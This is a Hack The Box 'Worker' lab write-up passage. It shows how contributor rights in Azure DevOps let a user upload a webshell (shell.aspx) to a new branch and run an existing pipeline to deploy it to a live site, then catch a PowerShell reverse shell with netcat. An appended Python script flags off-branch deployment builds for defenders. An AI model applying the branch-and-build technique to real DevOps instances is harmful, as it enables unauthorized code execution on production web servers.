Build Exploitation


The security configuration set for the current user, nathen, in the Permission and Control of the target Azure DevOps instance allows the user to alter the LIVE web applications by making a build using existing pipelines. This privilege is inherited through a transitive membership of the Contributors group via the SmartHotel360 Teams team.

According to the official Microsoft documentation, the Contributors group has both read and write access to repositories, work tracking, pipelines, and more.

Additional evidence is provided by the official Microsoft documentation.

The same goes for building a pipeline.

Creating A New Branch To Upload The Payload


Uploading the payload directly into the master branch is NOT permitted for the nathen user, as indicated by the error above.

Manual


A new branch, webshell, can be created manually under Branches in Repos.

Automated


Alternatively, changing the value of the Branch name field while attempting to upload directly into the master branch makes Azure DevOps create the branch for me automatically.

The newly created webshell branch is there with either the manual or the automated method.

Create A New Build To Push Out The Update


With the privileges given by the transitive membership of the Contributors group, I can push out the update by making a build with the existing pipelines. Attempting to create a new pipeline failed, as the nathen user does not have permission to do so.

The alpha application that is currently hosted from the master branch will change its source to the newly created webshell branch that contains the payload.

The build request is queued, handled, and eventually executed by the target Azure DevOps instance.

Clicking into it reveals that everything went well

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ curl -s http://alpha.worker.htb/shell.aspx

Invoking the reverse shell within the payload by browsing to the “update”

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.203] 49861
Windows PowerShell running as user WORKER$ on WORKER
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
ps c:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
ps c:\windows\system32\inetsrv> hostname
Worker
ps c:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::248
   ipv6 address. . . . . . . . . . . : dead:beef::88b5:926:be4b:fd40
   link-local ipv6 address . . . . . : fe80::88b5:926:be4b:fd40%4
   ipv4 address. . . . . . . . . . . : 10.10.10.203
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
                                       10.10.10.2

Initial foothold established on the target system as the iis apppool\defaultapppool account via Azure DevOps Build Exploitation.
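
From the defender's side, the build step above appears in the build history as a run of a deploying pipeline from a branch other than master. The following is an added example, not part of the original write-up: it scans build records shaped like the Azure DevOps Builds REST API response and flags such runs. The pipeline names, the records and the allow-list are constructed assumptions.

```python
# Constructed build records shaped like the "value" array returned by the
# Azure DevOps Builds REST API (_apis/build/builds). All values are made up.
SAMPLE_BUILDS = [
    {"id": 101, "reason": "individualCI", "sourceBranch": "refs/heads/master",
     "definition": {"name": "alpha-deploy"},
     "requestedFor": {"uniqueName": "ci-service"}},
    {"id": 102, "reason": "manual", "sourceBranch": "refs/heads/webshell",
     "definition": {"name": "alpha-deploy"},
     "requestedFor": {"uniqueName": "nathen"}},
    {"id": 103, "reason": "manual", "sourceBranch": "refs/heads/feature-x",
     "definition": {"name": "unit-tests"},
     "requestedFor": {"uniqueName": "nathen"}},
]

# Assumption: which pipelines publish to a live site, and from which refs.
DEPLOY_BRANCHES = {"alpha-deploy": {"refs/heads/master"}}


def off_branch_deploys(builds, deploy_branches):
    """Flag runs of a deploying pipeline whose source ref is not allow-listed."""
    findings = []
    for build in builds:
        pipeline = build.get("definition", {}).get("name")
        allowed = deploy_branches.get(pipeline)
        if allowed is None:
            continue  # pipeline does not publish anywhere; out of scope
        branch = build.get("sourceBranch", "")
        if branch in allowed:
            continue
        findings.append({
            "id": build.get("id"),
            "pipeline": pipeline,
            "branch": branch,
            "requested_for": build.get("requestedFor", {}).get("uniqueName"),
            # A hand-queued run is the stronger signal; CI/PR triggers on a
            # deploying pipeline point at a trigger misconfiguration instead.
            "manual": build.get("reason") == "manual",
        })
    return findings


if __name__ == "__main__":
    for finding in off_branch_deploys(SAMPLE_BUILDS, DEPLOY_BRANCHES):
        print(finding)
```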